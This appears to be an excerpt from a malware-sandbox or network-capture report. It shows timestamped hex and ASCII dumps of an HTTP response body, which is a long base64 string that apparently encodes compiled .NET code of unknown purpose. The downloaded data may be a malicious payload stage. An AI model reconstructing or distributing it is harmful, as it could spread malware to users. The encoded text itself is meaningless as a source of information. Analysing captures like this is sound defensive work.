                                                                            Data Ascii: AYAEfcoAwQABTd7Av///5s4AAAAACAm////pjkEAAWbewQABcd+AAAAACAGABHdKAL////AOAAAAAEgJv///8s5BAAFvnsEAAXHfgAAAAAgAAAAeTkBEQAAAEs4AAAAaAAAACsAAAB4AAAAUAAAAARFAAAM/gAAAAA4AAAO/gAAAAMgEQAAhgAAAK0AAzATACoGAA2BKAQABTd7Av///8I4AAAAACAm////zTkEAAW9ewQABcd+AAAAACAGABHd
                                                                            2023-03-21 08:11:06 UTC3106INData Raw: 67 41 41 46 6e 34 42 45 51 41 41 41 41 41 34 41 52 4d 47 41 41 2f 68 4b 41 59 53 41 76 2f 2f 2f 35 51 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 6e 7a 6b 45 41 41 57 4d 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 46 45 77 59 41 45 59 35 7a 46 77 49 52 41 52 46 36 42 67 41 4b 52 6e 4e 77 41 4b 36 55 63 67 51 52 41 41 41 41 64 7a 67 45 45 77 59 41 44 59 77 6f 41 52 45 47 45 51 49 53 65 67 59 41 43 6b 5a 7a 46 42 30 41 41 41 43 33 4f 41 41 41 41 41 55 41 41 41 42 58 41 41 41 41 48 77 41 41 41 4c 77 41 41 41 41 45 52 51 41 48 44 50 34 41 41 41 41 45 4f 41 41 41 41 41 49 67 42 68 4d 57 41 50 2f 2f 2f 39 55 34 41 41 4d 4f 2f 67 41 41 41 41 49 67 42 52 4d 55 41 41 41 41 45 54 67 41 41 41 4a 31 41 41 41 43 67 51 41 41 41 42 59 41 41 41 41 44 52 51 41 44 44 50 34 41
                                                                            Data Ascii: gAAFn4BEQAAAAA4ARMGAA/hKAYSAv///5Q4AAAAACAm////nzkEAAWMewQABcd+AAAAACAFEwYAEY5zFwIRARF6BgAKRnNwAK6UcgQRAAAAdzgEEwYADYwoAREGEQISegYACkZzFB0AAAC3OAAAAAUAAABXAAAAHwAAALwAAAAERQAHDP4AAAAEOAAAAAIgBhMWAP///9U4AAMO/gAAAAIgBRMUAAAAETgAAAJ1AAACgQAAABYAAAADRQADDP4A
                                                                            2023-03-21 08:11:06 UTC3122INData Raw: 44 6a 63 41 41 41 41 41 44 67 47 41 42 43 38 4b 41 49 41 41 41 41 52 33 51 41 41 41 41 41 34 42 67 41 51 71 69 67 57 41 67 41 41 41 41 41 41 41 41 41 41 4a 41 41 44 4d 41 73 41 41 50 2f 2f 2f 33 51 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 66 7a 6f 45 41 41 56 33 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 45 41 41 54 78 66 52 51 43 4b 67 41 41 41 41 41 34 42 41 41 45 38 6e 30 58 41 76 2f 2f 2f 36 63 34 41 41 41 41 41 53 41 6d 2f 2f 2f 2f 73 6a 6f 45 41 41 57 55 65 77 51 41 42 63 64 2b 41 41 41 41 41 53 41 41 41 41 41 72 4f 67 51 41 42 50 4a 37 41 76 2f 2f 2f 39 45 34 41 41 41 41 41 79 41 41 41 41 41 30 4f 51 51 41 42 50 46 37 41 67 41 41 41 44 38 34 41 41 41 41 55 51 41 41 41 42 6f 41 41 41 41 46 41 41 41 41 52 41 41 41 41 41 52 46 41 41 41 4d 2f 67 41 41
                                                                            Data Ascii: DjcAAAAADgGABC8KAIAAAAR3QAAAAA4BgAQqigWAgAAAAAAAAAAJAADMAsAAP///3Q4AAAAACAm////fzoEAAV3ewQABcd+AAAAACAEAATxfRQCKgAAAAA4BAAE8n0XAv///6c4AAAAASAm////sjoEAAWUewQABcd+AAAAASAAAAArOgQABPJ7Av///9E4AAAAAyAAAAA0OQQABPF7AgAAAD84AAAAUQAAABoAAAAFAAAARAAAAARFAAAM/gAA
                                                                            2023-03-21 08:11:06 UTC3138INData Raw: 41 41 44 49 41 41 41 41 43 45 34 2f 2f 2f 2f 65 7a 67 41 41 41 41 41 49 43 62 2f 2f 2f 2b 47 4f 67 51 41 42 5a 6c 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 41 41 41 48 6b 36 43 67 41 45 48 6d 38 43 45 67 51 45 41 41 54 70 65 77 4c 2f 2f 2f 2b 74 4f 41 41 41 41 41 4d 67 4a 76 2f 2f 2f 37 67 35 42 41 41 46 6f 48 73 45 41 41 58 48 66 67 41 41 41 41 51 67 41 41 41 41 34 7a 6f 47 41 42 42 74 4b 41 6f 41 41 42 5a 2b 42 43 6f 55 41 41 41 41 6d 54 67 41 41 41 41 48 41 41 41 41 61 41 41 41 41 50 6f 41 41 41 41 46 41 41 41 41 77 67 41 41 41 4a 34 41 41 41 41 47 52 51 41 41 44 50 34 41 41 41 41 41 4f 41 41 41 44 76 34 41 41 41 41 46 49 42 45 41 41 65 49 41 41 41 45 37 41 41 67 77 45 77 41 41 41 41 44 42 41 4f 71 39 41 43 30 41 41 67 41 41 45 41 45 41 41 41 44 2f
                                                                            Data Ascii: AADIAAAACE4////ezgAAAAAICb///+GOgQABZl7BAAFx34AAAAAIAAAAHk6CgAEHm8CEgQEAATpewL///+tOAAAAAMgJv///7g5BAAFoHsEAAXHfgAAAAQgAAAA4zoGABBtKAoAABZ+BCoUAAAAmTgAAAAHAAAAaAAAAPoAAAAFAAAAwgAAAJ4AAAAGRQAADP4AAAAAOAAADv4AAAAFIBEAAeIAAAE7AAgwEwAAAADBAOq9AC0AAgAAEAEAAAD/
                                                                            2023-03-21 08:11:06 UTC3154INData Raw: 67 41 41 46 6e 34 43 2f 2f 2f 2f 4b 44 67 41 41 41 41 41 49 43 62 2f 2f 2f 38 7a 4f 51 51 41 42 62 46 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 45 54 46 76 2f 2f 2f 30 6f 34 41 41 41 41 41 79 41 6d 2f 2f 2f 2f 56 54 6b 45 41 41 58 43 65 77 51 41 42 63 64 2b 41 41 41 41 42 69 41 42 45 31 67 58 41 52 48 2f 2f 2f 39 72 4f 41 41 41 44 76 34 41 41 41 41 46 49 41 41 41 41 4b 73 34 2f 2f 2f 2f 67 6a 67 41 41 41 41 43 49 43 62 2f 2f 2f 2b 4e 4f 67 51 41 42 62 42 37 42 41 41 46 78 33 34 41 41 41 41 43 49 41 41 41 41 4f 45 34 2f 2f 2f 2f 70 6a 67 41 41 41 41 45 49 43 62 2f 2f 2f 2b 78 4f 67 51 41 42 58 6c 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 41 41 41 50 4d 39 46 67 4d 41 41 41 42 64 4f 41 41 41 41 52 45 34 41 41 41 41 72 6a 67 41 41 41 41 50 41 41 41 41
                                                                            Data Ascii: gAAFn4C////KDgAAAAAICb///8zOQQABbF7BAAFx34AAAAAIAETFv///0o4AAAAAyAm////VTkEAAXCewQABcd+AAAABiABE1gXARH///9rOAAADv4AAAAFIAAAAKs4////gjgAAAACICb///+NOgQABbB7BAAFx34AAAACIAAAAOE4////pjgAAAAEICb///+xOgQABXl7BAAFx34AAAAAIAAAAPM9FgMAAABdOAAAARE4AAAArjgAAAAPAAAA
                                                                            2023-03-21 08:11:06 UTC3170INData Raw: 41 41 71 41 66 34 55 42 41 41 45 77 6e 34 6d 4b 67 51 41 42 4d 46 37 41 68 34 71 42 41 41 45 77 48 73 43 48 67 41 41 41 43 72 2f 2f 2f 2b 59 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 36 4d 36 42 41 41 46 73 33 73 45 41 41 58 48 66 67 41 41 41 41 41 67 42 41 41 45 77 48 30 43 41 41 45 52 6a 51 4d 43 2f 2f 2f 2f 77 7a 67 41 41 41 41 42 49 43 62 2f 2f 2f 2f 4f 4f 67 51 41 42 63 42 37 42 41 41 46 78 33 34 41 41 41 41 42 49 41 51 41 42 4d 46 39 41 67 41 42 45 6f 30 45 41 67 41 41 41 41 41 34 41 41 41 41 57 77 41 41 41 41 55 41 41 41 41 43 52 51 41 41 44 50 37 2f 2f 2f 2f 77 4f 41 41 41 41 45 59 34 43 67 41 41 46 43 67 43 45 51 41 41 48 41 41 41 41 48 30 41 41 7a 41 54 41 43 6f 45 41 41 53 2f 66 68 6f 41 41 43 6f 42 2f 68 51 45 41 41 53 2f 66 69 59 41 4b 76 2f 2f
                                                                            Data Ascii: AAqAf4UBAAEwn4mKgQABMF7Ah4qBAAEwHsCHgAAACr///+YOAAAAAAgJv///6M6BAAFs3sEAAXHfgAAAAAgBAAEwH0CAAERjQMC////wzgAAAABICb////OOgQABcB7BAAFx34AAAABIAQABMF9AgABEo0EAgAAAAA4AAAAWwAAAAUAAAACRQAADP7////wOAAAAEY4CgAAFCgCEQAAHAAAAH0AAzATACoEAAS/fhoAACoB/hQEAAS/fiYAKv//
                                                                            2023-03-21 08:11:06 UTC3186INData Raw: 67 41 41 41 47 67 41 41 41 43 4f 41 41 41 41 42 55 55 41 41 51 7a 2b 41 41 41 41 41 44 67 41 41 51 37 2b 41 41 41 41 41 53 41 52 41 41 48 49 41 41 41 42 41 67 41 45 4d 42 4d 41 41 41 41 41 41 41 41 41 52 51 41 41 41 70 45 41 41 41 4a 34 41 41 41 41 47 51 41 41 41 41 49 41 41 41 41 41 41 41 41 41 45 77 41 41 41 6d 38 41 41 41 46 43 41 41 41 42 4c 51 41 41 41 41 49 42 41 41 42 64 41 41 41 41 55 41 41 41 41 5a 45 41 41 41 41 53 41 41 41 42 66 77 41 41 41 41 41 41 41 45 78 42 41 41 41 41 2f 2f 2f 39 47 7a 67 45 45 78 62 2f 2f 2f 30 55 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 52 38 35 42 41 41 46 78 6e 73 45 41 41 58 48 66 67 41 41 41 41 41 67 33 50 2f 2f 2f 38 77 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 31 7a 6f 45 41 41 57 42 65 77 51 41 42 63 64 2b 41 41 41 41
                                                                            Data Ascii: gAAAGgAAACOAAAABUUAAQz+AAAAADgAAQ7+AAAAASARAAHIAAABAgAEMBMAAAAAAAAARQAAApEAAAJ4AAAAGQAAAAIAAAAAAAAAEwAAAm8AAAFCAAABLQAAAAIBAABdAAAAUAAAAZEAAAASAAABfwAAAAAAAExBAAAA///9GzgEExb///0UOAAAAAAgJv///R85BAAFxnsEAAXHfgAAAAAg3P///8w4AAAAACAm////1zoEAAWBewQABcd+AAAA
                                                                            2023-03-21 08:11:06 UTC3202INData Raw: 50 34 41 41 41 41 41 4f 41 41 41 44 76 34 41 41 41 41 42 49 42 45 41 41 4b 6f 41 41 41 44 70 41 41 4d 77 45 77 41 41 41 43 6f 48 45 53 6f 57 2f 2f 2f 2b 53 44 6a 2f 2f 2f 2f 50 4f 51 59 41 44 62 49 6f 42 68 48 2f 2f 2f 32 6d 4f 50 2f 2f 2f 30 59 36 42 67 41 4e 72 69 67 55 63 41 43 61 39 58 4c 2f 2f 2f 77 73 4f 41 41 41 41 41 55 67 44 52 4e 59 46 77 30 52 2f 2f 2f 38 50 44 67 41 41 41 41 47 49 43 62 2f 2f 2f 78 48 4f 67 51 41 42 57 74 37 42 41 41 46 78 33 34 41 41 41 41 46 49 50 2f 2f 2f 6c 59 35 42 67 41 4e 72 69 67 55 63 41 43 61 72 33 4c 2f 2f 2f 78 72 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 48 59 35 42 41 41 46 74 6e 73 45 41 41 58 48 66 67 41 41 41 41 51 67 41 68 4d 55 2f 2f 2f 38 6a 54 67 41 41 41 41 53 49 43 62 2f 2f 2f 79 59 4f 67 51 41 42 59 52 37
                                                                            Data Ascii: P4AAAAAOAAADv4AAAABIBEAAKoAAADpAAMwEwAAACoHESoW///+SDj////POQYADbIoBhH///2mOP///0Y6BgANrigUcACa9XL///wsOAAAAAUgDRNYFw0R///8PDgAAAAGICb///xHOgQABWt7BAAFx34AAAAFIP///lY5BgANrigUcACar3L///xrOAAAAAAgJv///HY5BAAFtnsEAAXHfgAAAAQgAhMU///8jTgAAAASICb///yYOgQABYR7
                                                                            2023-03-21 08:11:06 UTC3218INData Raw: 67 41 41 41 41 41 67 2f 2f 2f 2f 31 44 6a 2f 2f 2f 2b 67 4f 41 41 41 41 41 45 67 4a 76 2f 2f 2f 36 73 36 42 41 41 46 69 48 73 45 41 41 58 48 66 67 41 41 41 41 45 67 41 41 41 41 52 54 6b 44 4b 67 49 71 43 67 41 41 48 53 67 44 41 76 2f 2f 2f 2b 55 34 41 41 41 41 44 7a 6b 43 2f 2f 2f 2f 32 6a 67 41 41 41 41 43 49 41 41 41 41 42 55 36 41 77 41 41 41 42 73 34 41 41 41 41 54 77 41 41 41 48 4d 41 41 41 41 67 41 41 41 41 41 30 55 41 41 41 7a 2b 41 41 41 41 4b 6a 67 52 41 41 41 63 41 41 41 41 6b 51 41 44 4d 42 4d 41 41 41 41 41 41 41 41 41 52 51 41 41 42 4f 51 41 41 41 53 52 41 41 41 41 55 77 41 41 41 41 49 41 41 41 41 41 41 41 41 41 62 51 41 41 42 65 49 41 41 41 43 75 41 41 41 46 4e 41 41 41 41 41 49 41 41 44 52 42 41 50 2f 2f 2b 58 6f 34 41 41 41 41 41 79 41 48
                                                                            Data Ascii: gAAAAAg////1Dj///+gOAAAAAEgJv///6s6BAAFiHsEAAXHfgAAAAEgAAAARTkDKgIqCgAAHSgDAv///+U4AAAADzkC////2jgAAAACIAAAABU6AwAAABs4AAAATwAAAHMAAAAgAAAAA0UAAAz+AAAAKjgRAAAcAAAAkQADMBMAAAAAAAAARQAABOQAAASRAAAAUwAAAAIAAAAAAAAAbQAABeIAAACuAAAFNAAAAAIAADRBAP//+Xo4AAAAAyAH
                                                                            2023-03-21 08:11:06 UTC3234INData Raw: 41 4d 77 47 77 41 71 65 67 6f 41 41 56 46 7a 42 67 41 4d 65 79 67 4b 41 41 41 70 4b 41 49 41 41 4e 58 51 41 41 41 41 41 44 67 41 41 41 41 61 4f 51 51 41 41 2f 31 37 41 70 6f 41 4b 67 41 41 41 41 41 34 42 67 41 4d 5a 53 67 45 41 77 49 36 41 43 6f 4b 41 41 42 43 62 77 41 41 43 66 34 71 41 43 6f 4b 41 41 49 6d 62 77 41 41 43 66 34 71 41 43 6f 4b 41 41 47 65 62 77 41 42 43 66 34 41 41 41 6e 2b 4f 67 41 71 42 67 41 48 47 32 38 41 41 41 6e 2b 4b 67 41 71 42 67 41 4d 58 47 38 41 41 51 6e 2b 41 41 41 4a 2f 6a 6f 41 4b 67 51 41 41 2f 70 2b 47 67 41 41 4b 67 48 2b 46 41 51 41 41 2f 70 2b 4a 67 45 41 41 42 78 45 41 52 6a 5a 41 44 38 41 41 41 41 41 41 41 42 46 41 4d 6c 50 41 48 6f 41 41 67 41 41 48 41 45 41 41 41 44 2f 2f 2f 35 64 4f 41 41 41 41 41 45 67 4a 76 2f 2f
                                                                            Data Ascii: AMwGwAqegoAAVFzBgAMeygKAAApKAIAANXQAAAAADgAAAAaOQQAA/17ApoAKgAAAAA4BgAMZSgEAwI6ACoKAABCbwAACf4qACoKAAImbwAACf4qACoKAAGebwABCf4AAAn+OgAqBgAHG28AAAn+KgAqBgAMXG8AAQn+AAAJ/joAKgQAA/p+GgAAKgH+FAQAA/p+JgEAABxEARjZAD8AAAAAAABFAMlPAHoAAgAAHAEAAAD///5dOAAAAAEgJv//
                                                                            2023-03-21 08:11:06 UTC3250INData Raw: 50 2f 2f 2f 2f 4d 34 42 41 41 44 35 33 30 58 41 69 6f 41 41 41 41 42 4f 45 6f 41 41 50 2f 2f 2f 37 41 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 75 7a 6f 45 41 41 57 73 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 45 41 41 50 6e 66 52 63 43 2f 2f 2f 2f 36 44 67 4b 41 41 4f 6e 62 77 49 41 41 4e 42 30 42 41 4d 45 41 41 50 6d 65 77 49 71 41 41 41 41 41 54 67 41 41 41 41 64 41 41 41 41 42 67 41 41 41 41 4a 46 41 41 41 4d 2f 67 41 41 41 41 41 34 41 41 41 4f 2f 67 41 41 41 41 45 67 45 51 41 41 48 41 41 41 41 47 49 41 42 44 41 54 41 41 44 2f 2f 2f 2f 73 4f 41 6f 41 41 35 74 76 42 41 59 41 44 42 55 6f 41 77 49 43 4b 67 41 41 41 41 45 34 5a 76 2f 2f 2f 37 59 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 77 54 6b 45 41 41 57 32 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 45
                                                                            Data Ascii: P////M4BAAD530XAioAAAABOEoAAP///7A4AAAAACAm////uzoEAAWsewQABcd+AAAAACAEAAPnfRcC////6DgKAAOnbwIAANB0BAMEAAPmewIqAAAAATgAAAAdAAAABgAAAAJFAAAM/gAAAAA4AAAO/gAAAAEgEQAAHAAAAGIABDATAAD////sOAoAA5tvBAYADBUoAwICKgAAAAE4Zv///7Y4AAAAACAm////wTkEAAW2ewQABcd+AAAAACAE
                                                                            2023-03-21 08:11:06 UTC3266INData Raw: 43 41 42 45 77 6f 41 41 34 4e 7a 46 76 2f 2f 2f 37 67 34 41 41 41 41 41 79 41 6d 2f 2f 2f 2f 77 7a 6b 45 41 41 56 77 65 77 51 41 42 63 64 2b 41 41 41 41 41 53 41 41 41 41 42 34 4f 67 55 52 41 41 41 41 57 6a 67 41 41 41 43 45 41 41 41 41 4b 77 41 41 41 49 30 41 41 41 42 7a 41 41 41 41 55 67 41 41 41 46 38 41 41 41 41 47 52 51 41 47 44 50 34 41 41 41 41 45 4f 41 41 41 41 41 49 67 42 52 4d 72 41 41 41 6c 4b 42 51 55 42 41 41 44 78 48 38 41 2f 2f 2f 2f 31 6a 67 41 45 78 62 2f 2f 2f 2f 4d 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 39 63 35 42 41 41 46 66 58 73 45 41 41 58 48 66 67 41 41 41 41 45 67 41 52 4d 55 41 41 41 42 31 7a 67 41 41 41 41 76 41 41 41 42 33 41 41 41 41 41 4a 46 41 41 49 4d 2f 67 41 41 41 44 67 34 45 51 41 42 69 41 41 41 41 66 55 41 42 44 41 62
                                                                            Data Ascii: CABEwoAA4NzFv///7g4AAAAAyAm////wzkEAAVwewQABcd+AAAAASAAAAB4OgURAAAAWjgAAACEAAAAKwAAAI0AAABzAAAAUgAAAF8AAAAGRQAGDP4AAAAEOAAAAAIgBRMrAAAlKBQUBAADxH8A////1jgAExb////MOAAAAAAgJv///9c5BAAFfXsEAAXHfgAAAAEgARMUAAAB1zgAAAAvAAAB3AAAAAJFAAIM/gAAADg4EQABiAAAAfUABDAb
                                                                            2023-03-21 08:11:06 UTC3282INData Raw: 67 59 41 43 30 4d 6f 49 78 45 41 41 41 42 32 4f 41 41 41 41 41 55 41 41 41 41 77 41 41 41 41 65 77 41 41 41 41 4e 46 41 44 51 4d 2f 67 41 41 41 41 51 34 41 41 41 41 41 53 41 6d 41 41 41 41 44 7a 6f 45 41 41 57 79 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 41 41 41 41 35 4f 41 41 41 41 41 41 41 4f 41 41 41 41 41 55 41 41 41 41 42 52 51 41 48 44 50 34 41 41 41 41 45 4f 41 41 41 41 41 41 67 4a 67 41 41 41 41 38 36 42 41 41 46 79 58 73 45 41 41 58 48 66 67 41 41 41 41 41 67 49 78 4d 47 41 41 73 2b 4b 41 59 41 43 7a 30 6f 42 52 45 41 2f 2f 2f 74 68 7a 67 41 41 41 41 42 49 43 62 2f 2f 2b 32 53 4f 67 51 41 42 58 52 37 42 41 41 46 78 33 34 41 41 41 41 4a 49 41 59 41 43 30 38 6f 42 41 41 44 71 6e 73 43 4e 52 48 2f 2f 2b 32 7a 4f 41 41 41 41 41 67 67 51 52 4d 47
                                                                            Data Ascii: gYAC0MoIxEAAAB2OAAAAAUAAAAwAAAAewAAAANFADQM/gAAAAQ4AAAAASAmAAAADzoEAAWyewQABcd+AAAAACAAAAA5OAAAAAAAOAAAAAUAAAABRQAHDP4AAAAEOAAAAAAgJgAAAA86BAAFyXsEAAXHfgAAAAAgIxMGAAs+KAYACz0oBREA///thzgAAAABICb//+2SOgQABXR7BAAFx34AAAAJIAYAC08oBAADqnsCNRH//+2zOAAAAAggQRMG
                                                                            2023-03-21 08:11:06 UTC3298INData Raw: 6a 67 41 41 41 41 41 49 43 62 2f 2f 2f 2b 68 4f 67 51 41 42 59 64 37 42 41 41 46 78 33 34 41 41 41 41 45 49 41 59 41 43 70 73 6f 41 68 48 2f 2f 2f 2b 38 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 38 63 35 42 41 41 46 6f 33 73 45 41 41 58 48 66 67 41 41 41 41 45 67 41 41 41 41 75 7a 6b 43 45 51 41 41 41 41 41 34 41 41 41 41 70 51 41 41 41 4d 63 41 41 41 42 35 41 41 41 41 4b 77 41 41 41 41 55 41 41 41 41 46 52 51 41 42 44 50 34 41 41 41 43 72 4f 42 45 41 41 58 51 41 41 41 45 55 41 41 51 77 45 2f 2f 2f 2f 38 73 34 42 67 41 4c 45 57 38 46 41 52 48 2f 2f 2f 39 69 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 32 30 35 42 41 41 46 62 58 73 45 41 41 58 48 66 67 41 41 41 41 41 67 42 67 41 4b 76 53 67 45 44 67 45 52 41 41 41 41 4b 44 67 42 45 77 59 41 43 77 6c 7a 42 41 4d 43
                                                                            Data Ascii: jgAAAAAICb///+hOgQABYd7BAAFx34AAAAEIAYACpsoAhH///+8OAAAAAAgJv///8c5BAAFo3sEAAXHfgAAAAEgAAAAuzkCEQAAAAA4AAAApQAAAMcAAAB5AAAAKwAAAAUAAAAFRQABDP4AAACrOBEAAXQAAAEUAAQwE////8s4BgALEW8FARH///9iOAAAAAAgJv///205BAAFbXsEAAXHfgAAAAAgBgAKvSgEDgERAAAAKDgBEwYACwlzBAMC
                                                                            2023-03-21 08:11:06 UTC3314INData Raw: 41 41 41 41 41 77 67 6f 6e 41 41 66 6f 39 79 47 67 41 52 2f 2f 2f 2f 4a 44 67 41 41 41 41 51 49 4b 4a 77 41 48 35 7a 63 68 49 66 41 42 48 2f 2f 2f 38 30 4f 41 41 42 44 76 34 41 41 41 41 49 49 4b 4a 77 41 48 35 46 63 67 30 66 41 42 48 2f 2f 2f 39 51 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 31 73 36 42 41 41 46 76 48 73 45 41 41 58 48 66 67 41 41 41 41 41 67 6f 6e 41 41 66 68 4e 79 43 68 38 41 45 66 2f 2f 2f 33 55 34 41 41 45 4f 2f 67 41 41 41 42 45 67 6f 6e 41 41 66 66 64 79 45 42 38 41 45 51 41 41 41 57 6f 34 6f 6e 41 41 66 63 56 79 48 51 41 52 41 41 41 41 44 6a 69 69 63 41 42 39 75 58 49 50 48 77 41 52 41 41 41 42 64 7a 67 41 41 41 45 56 41 41 41 42 7a 67 41 41 41 41 55 41 41 41 41 36 41 41 41 41 46 41 41 41 41 4e 34 41 41 41 42 6a 41 41 41 42 2f 77 41 41
                                                                            Data Ascii: AAAAAwgonAAfo9yGgAR////JDgAAAAQIKJwAH5zchIfABH///80OAABDv4AAAAIIKJwAH5Fcg0fABH///9QOAAAAAAgJv///1s6BAAFvHsEAAXHfgAAAAAgonAAfhNyCh8AEf///3U4AAEO/gAAABEgonAAffdyEB8AEQAAAWo4onAAfcVyHQARAAAADjiicAB9uXIPHwARAAABdzgAAAEVAAABzgAAAAUAAAA6AAAAFAAAAN4AAABjAAAB/wAA
                                                                            2023-03-21 08:11:06 UTC3330INData Raw: 4e 41 4b 41 41 4d 67 66 67 6f 41 41 65 31 76 41 78 48 2f 2f 2f 53 59 4f 41 41 41 41 41 55 67 4a 67 6f 41 41 6a 64 76 43 67 41 41 4b 53 67 42 41 41 42 44 30 41 6f 41 41 78 39 2b 42 67 41 4b 46 43 67 44 45 66 2f 2f 39 4c 34 34 41 41 41 41 61 69 41 41 41 41 52 31 4f 67 59 41 43 68 67 6f 43 68 48 2f 2f 2f 54 55 4f 41 41 41 41 41 6b 67 4a 76 2f 2f 39 4e 38 36 42 41 41 46 71 6e 73 45 41 41 58 48 66 67 41 41 41 45 30 67 43 67 41 43 55 57 38 42 41 41 41 44 6a 41 59 41 41 32 49 6f 44 52 45 4b 41 41 4a 5a 66 67 59 52 2f 2f 2f 31 43 7a 67 41 41 41 41 33 49 43 59 4b 41 41 49 33 62 77 6f 41 41 43 6b 6f 41 51 41 41 41 39 41 4b 41 41 48 50 66 67 6f 41 41 65 31 76 41 78 45 41 41 41 48 30 4f 43 59 47 41 41 6f 54 4b 41 6f 41 41 43 6b 6f 41 51 41 41 43 4e 41 4b 41 41 4a 54
                                                                            Data Ascii: NAKAAMgfgoAAe1vAxH///SYOAAAAAUgJgoAAjdvCgAAKSgBAABD0AoAAx9+BgAKFCgDEf//9L44AAAAaiAAAAR1OgYAChgoChH///TUOAAAAAkgJv//9N86BAAFqnsEAAXHfgAAAE0gCgACUW8BAAADjAYAA2IoDREKAAJZfgYR///1CzgAAAA3ICYKAAI3bwoAACkoAQAAA9AKAAHPfgoAAe1vAxEAAAH0OCYGAAoTKAoAACkoAQAACNAKAAJT
                                                                            2023-03-21 08:11:06 UTC3346INData Raw: 77 41 41 41 4f 51 41 41 41 46 44 41 41 41 42 33 67 41 41 41 61 77 41 41 41 41 51 52 51 41 46 44 50 34 41 41 41 41 41 4f 41 41 46 44 76 34 41 41 41 41 4f 49 42 45 41 41 56 45 41 41 41 4a 34 41 41 59 77 45 77 41 41 41 50 2f 2f 2f 6e 55 34 41 41 41 41 41 69 41 47 41 41 6d 6d 4b 41 4c 2f 2f 2f 36 46 4f 41 41 41 41 41 45 67 4a 76 2f 2f 2f 70 41 35 42 41 41 46 74 33 73 45 41 41 58 48 66 67 41 41 41 41 41 67 2f 2f 2f 2f 74 7a 6f 4b 41 41 46 72 4b 41 51 41 41 64 68 38 41 42 48 2f 2f 2f 36 31 4f 41 41 41 41 41 55 67 4a 76 2f 2f 2f 73 41 35 42 41 41 46 65 58 73 45 41 41 58 48 66 67 41 41 41 41 63 67 2f 2f 2f 2f 6d 54 38 47 41 41 6d 78 4b 41 49 44 4b 67 6f 41 41 57 34 6f 42 41 41 42 32 48 77 41 45 58 6f 47 41 41 70 48 63 33 41 41 65 66 64 79 2f 2f 2f 2b 2b 44 67 41
                                                                            Data Ascii: wAAAOQAAAFDAAAB3gAAAawAAAAQRQAFDP4AAAAAOAAFDv4AAAAOIBEAAVEAAAJ4AAYwEwAAAP///nU4AAAAAiAGAAmmKAL///6FOAAAAAEgJv///pA5BAAFt3sEAAXHfgAAAAAg////tzoKAAFrKAQAAdh8ABH///61OAAAAAUgJv///sA5BAAFeXsEAAXHfgAAAAcg////mT8GAAmxKAIDKgoAAW4oBAAB2HwAEXoGAApHc3AAefdy///++DgA
                                                                            2023-03-21 08:11:06 UTC3362INData Raw: 51 41 42 51 41 41 41 41 46 6f 41 42 44 41 54 41 41 41 41 2f 2f 2f 2f 36 54 67 4b 41 41 4c 43 62 77 45 41 41 41 53 4d 41 33 41 41 64 36 56 79 41 69 6f 41 41 41 41 42 4f 48 4c 2f 2f 2f 2f 6c 4f 43 59 4b 41 41 4c 42 62 77 41 53 63 41 42 33 70 58 49 43 4b 67 59 41 43 56 4d 6f 41 42 45 41 41 41 41 49 4f 42 45 41 41 54 38 41 41 41 41 67 41 41 51 77 45 79 6f 41 41 41 41 41 4f 41 59 41 43 56 49 6f 41 51 41 41 42 49 77 44 63 41 42 33 69 33 49 43 58 67 41 71 42 67 41 4a 55 79 67 41 45 51 41 41 41 41 41 34 4a 67 6f 41 41 73 46 76 41 42 4a 77 41 48 65 4c 63 67 49 52 41 41 45 2f 41 41 41 41 47 77 41 45 4d 42 4d 41 4b 67 41 41 41 41 41 34 42 67 41 4a 55 69 67 44 63 41 42 33 65 33 49 43 53 67 41 71 43 67 41 41 64 47 38 42 45 53 6f 55 2f 2f 2f 2f 74 54 67 41 41 41 41 41
                                                                            Data Ascii: QABQAAAAFoABDATAAAA////6TgKAALCbwEAAASMA3AAd6VyAioAAAABOHL////lOCYKAALBbwAScAB3pXICKgYACVMoABEAAAAIOBEAAT8AAAAgAAQwEyoAAAAAOAYACVIoAQAABIwDcAB3i3ICXgAqBgAJUygAEQAAAAA4JgoAAsFvABJwAHeLcgIRAAE/AAAAGwAEMBMAKgAAAAA4BgAJUigDcAB3e3ICSgAqCgAAdG8BESoU////tTgAAAAA
                                                                            2023-03-21 08:11:06 UTC3378INData Raw: 2f 2f 2b 2f 44 67 41 41 41 41 42 49 43 62 2f 2f 2f 38 48 4f 67 51 41 42 61 39 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 55 54 43 67 41 43 73 6e 4d 44 41 42 48 2f 2f 2f 38 6c 4f 41 41 41 41 41 59 67 41 41 41 41 64 54 6a 2f 2f 2f 38 30 4f 41 41 41 41 41 55 67 41 41 41 41 51 6a 67 41 41 41 42 34 4f 41 6f 41 41 71 34 6f 46 67 55 52 2f 2f 2f 2f 55 44 67 41 41 41 41 49 49 41 6f 41 41 71 31 76 43 67 41 43 71 57 38 42 45 51 59 52 2f 2f 2f 2f 61 44 67 41 41 41 41 41 49 43 62 2f 2f 2f 39 7a 4f 51 51 41 42 5a 4a 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 63 54 46 67 41 41 41 45 63 34 41 41 41 41 42 54 6f 4b 41 41 4b 67 62 77 55 53 41 67 6f 41 41 70 39 2b 2f 2f 2f 2f 6f 54 67 41 41 41 41 44 49 41 41 41 41 46 73 2b 46 67 6f 41 41 71 56 76 41 52 45 41 41 41 45 77
